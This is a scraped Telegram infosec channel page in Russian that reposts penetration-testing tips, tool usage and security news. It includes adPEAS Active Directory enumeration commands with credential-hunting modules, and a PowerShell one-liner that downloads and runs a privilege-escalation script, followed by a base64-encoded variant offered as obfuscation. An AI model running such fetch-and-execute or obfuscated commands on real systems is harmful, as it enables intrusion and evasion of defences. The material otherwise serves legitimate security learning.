Fsecurity | HH
Відкрити в Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
Показати більше2 011
Підписники
Немає даних24 години
+27 днів
-1030 день
Архів дописів
2 011
Repost from Pentest HaT
🏃 adPEAS 0.8.24
Отличный инструмент для проведения enumeration в 🏠 Active Directory
Полная версия имеет встроенный модуль SharpHound для сбора информации в 😉 Bloodhound
adPEAS-Light отличается отсутствием модуля для BH, соответственно меньше вероятность детектирования антивирусом
Стандартный запуск:
Import-Module .\adPEAS.ps1
Invoke-adPEAS
Доступные модули:
Domain - поиск базовой информации о контроллерах домена, сайтов, трастов и стандартных парольных политиках Rights - поиск различных прав, например LAPS, DCSync и т.д. GPO - базовая информация о групповых политиках ADCS - информация о центрах сертификации Creds - ASREPRoast, Kerberoasting, GroupPolicies, Netlogon скрипты, LAPS, gMSA и т.д. Delegation - поиск делегирования, например ограниченное делегирование, неограниченное делегирование и RBCD (Resource Based Constrained Delegation) для компьютеров и учетных записей Accounts - информация об аккаунтах Computer - AD DS, AD CS, Exchange серверы и т.д. BloodHound - сборщик данных для BHВарианты запуска:
Invoke-adPEAS -Domain 'contoso.com' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor
Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'
Определенная УЗ:
$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)
Invoke-adPEAS -Domain 'contoso.com' -Cred $Cred
Модули:
Invoke-adPEAS -Module Domain
Invoke-adPEAS -Module Rights
Invoke-adPEAS -Module GPO
Invoke-adPEAS -Module ADCS
Invoke-adPEAS -Module Creds
Invoke-adPEAS -Module Delegation
Invoke-adPEAS -Module Accounts
Invoke-adPEAS -Module Computer
Invoke-adPEAS -Module Bloodhound -Scope All
💻 Home
#soft #powershell #activedirectory #enumeration
✈️ // Pentest HaT 🎩2 011
Repost from Caster
Релиз моей статьи об осторожном пентесте сетевой инфраструктуры
Caster - Stockholm Syndrome
Genre: Offensive
Label: exploit.org
Release Date: 29 July 2024
Performed by: Caster
Written by: Magama Bazarov
Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)
https://blog.exploit.org/caster-stockholm-syndrome
2 011
Repost from SHADOW:Group
⏳ Обход аутентификации с помощью Race Condition, приводящий к полному захвату учетной записи
Помните исследование Джеймса Кеттла про Race Condition? В данной статье будет пример реализации данного исследования на практике во время багхантинга и, как итог, захват любого аккаунта на сайте.
Ссылка на статью
#web #race #ato
2 011
+2
📶 DNS, DHCP и NAT: шпаргалка по сетям для этичного хакера
#network #fundamentals
2 011
Repost from НеКасперский
Тайна покрытая сроком
Двое россиян взяли на себя ответственность за участие в многочисленных атаках группировки LockBit на организации по всему миру.
Министерство юстиции США заявило, что граждане РФ Руслан Астамиров и Михаил Васильев сотрудничают с LockBit. Злоумышленники занимались поиском уязвимостей, взломом систем и кражей конфиденциальных данных.
В судебных документах указано, что Астамиров признал свою причастность к атакам группировки в период с 2020 по 2023 год. От его рук пострадало минимум 10 организаций, в том числе компании в Японии, Франции, Шотландии, Кении и США.
Его сообщник являлся «партнёром» LockBit с 2021 по 2023 год, он совершил не менее чем 12 нападений на ресурсы компаний по всему миру. Его деятельность нанесла ущерб на сумму $500 тысяч.
Теперь Васильеву грозит лишение свободы на срок до 45 лет, а Астамирову — до 25 лет тюремного заключения.
Напомним, что ранее глава группировки — LockBitSupp опровергал свою причастность к РФ. По всей видимости, группировка действительно имеет российские корни.
НеКасперский
2 011
Repost from Похек
💻 Yet Another Windows PrivEsc Script
#windows #privesc
Маленький воскресный пост про очередной небольшой скрипт для поиска мисконфигураций в Windows, которые приводят к повышению привилегий. Но тем не менее репа собрали более 500 звёзд, значит заслуживает внимания.
Эксплуатация:
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/enjoiz/Privesc/master/privesc.ps1")
И вот простенькая обфускация:
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/enjoiz/Privesc/master/privesc.ps1")'))
powershell -e $encoded
🧩 Github
🌚 @poxek2 011
Repost from Kali Linux
💻 TuDoor — новая опасная уязвимость, связанная с DNS
Исследователи обнаружили новую опасную уязвимость в системе доменных имён (DNS), с помощью которой можно проводить специальную атаку, названную исследователями «TuDoor». Эта атака может быть использована для отравления кэша DNS, вызова состояния отказа в обслуживании (DoS) и истощения ресурсов, что делает её значительной угрозой для интернет-безопасности.
Эксперименты специалистов подтвердили, что атака TuDoor возможна и имеет серьёзные последствия в реальных условиях. В общей сложности 24 популярные DNS-программы, включая BIND, PowerDNS и Microsoft DNS, уязвимы для TuDoor. Злоумышленники могут выполнить отравление кэша или DoS-атаку против уязвимых резолверов, используя всего несколько специально сформированных пакетов менее чем за одну секунду.
Для оценки масштабов проблемы исследователи протестировали 16 популярных моделей Wi-Fi маршрутизаторов, 6 операционных систем маршрутизаторов, 42 публичных DNS-сервиса и около 1,8 миллиона открытых DNS-резолверов. Результаты показали, что TuDoor может эксплуатировать 7 маршрутизаторов (и их ОС), 18 публичных DNS-сервисов и 424 652 (23,1%) открытых DNS-резолверов.
Исследователи следовали лучшим практикам ответственного раскрытия информации, уведомив всех затронутых вендоров о найденных уязвимостях. В результате 18 из них, включая BIND, Chrome, Cloudflare и Microsoft, подтвердили данные и обсудили меры по их устранению. Кроме того, были присвоены 33 идентификатора CVE для обнаруженных уязвимостей, и предложен онлайн-инструмент для их обнаружения.
@linuxkalii
2 011
+1
🔍 Если в ходе пентеста/багбаунти вы нашли домен Docker Registry (подсказка: HTTP-заголовок Docker-Distribution-Api-Version: registry/2.0), обязательно проверьте эндпоинт /v2/_catalog.
По умолчанию он не требует аутентификацию и позволяет раскрыть конфиденциальные данные. Ниже — пруфы и инструмент для автоматизация.
🥷 Эксплуатация Docker Registry
🛠 DockerRegistryGrabber
#pentest #tools #writeup #bugbounty
2 011
Repost from N/a
👋Привет!
На связи Ximera-Chan🎧
Nessus - это популярная уязвимость сканер, используемый кибербезопасность специалистов для идентификации уязвимостей в компьютерных системах, сетях и веб-приложениях. Разработанная Tenable, Inc., он теперь доступен как коммерческий продукт и бесплатная, открытый исходный код инструмент под названием Nessus Essentials.
Nessus работает, выполняя автоматизированные проверки уязвимостей на целевой системе или диапазоне систем, используя базу данных известных уязвимостей и конфигурационных проблем. Затем он генерирует отчет, определяющий обнаруженные уязвимости, их степень серьезности и рекомендации по устранению.
Некоторые из ключевых функций Nessus включают в себя:
1. Широкий охват: Nessus поддерживает широкий спектр платформ, включая Windows, Linux и macOS, и может сканировать уязвимости в различных сетевых устройствах, веб-приложениях и облачных средах.
2. Точные и актуальные проверки уязвимостей: Nessus использует обширную и постоянно обновляемую библиотеку плагинов для выполнения проверок уязвимостей, обеспечивая точность сканирования и актуальность в соответствии с текущей угрозой ландшафта.
3. Простой в использовании веб-интерфейс: Nessus предоставляет интуитивно понятный веб-интерфейс для настройки сканирования, управления активами и создания отчетов, делая его доступным для пользователей с различными уровнями знаний.
4. Интеграция с другими средствами безопасности: Nessus может интегрироваться с популярными системами управления событиями и информацией о безопасности (SIEM), системами тикетов и другими средствами безопасности, обеспечивая seamless workflows и эффективное управление уязвимостями.
5. Аудит соответствия: Nessus может выполнять аудит соответствия стандартам и регламентам промышленности, таким как PCI DSS, HIPAA и NIST, помогая организациям соблюдать соответствие и уменьшать риск данных утечек.
Чтобы использовать Nessus, вам нужно создать аккаунт на сайте Tenable, скачать сканер Nessus и установить его на своем компьютере. После установки вы можете настроить сканирование, добавить цели и управлять уязвимостями с помощью веб-интерфейса. Nessus Essentials бесплатен для личной установки, в то время как Nessus Professional и Nessus Manager - это коммерческие продукты с дополнительными функциями и поддержкой.
Вкратце, Nessus - мощный и широко используемый сканер уязвимостей, который помогает организациям определять и устранять уязвимости в своих системах и приложениях, обеспечивая прочную безопасность и уменьшая риск утечек данных.
P.s. могут быть ошибки... Генерация Ai
[Ximera-Chan]
Вже доступно! Дослідження Telegram за 2025 — головні інсайти року 
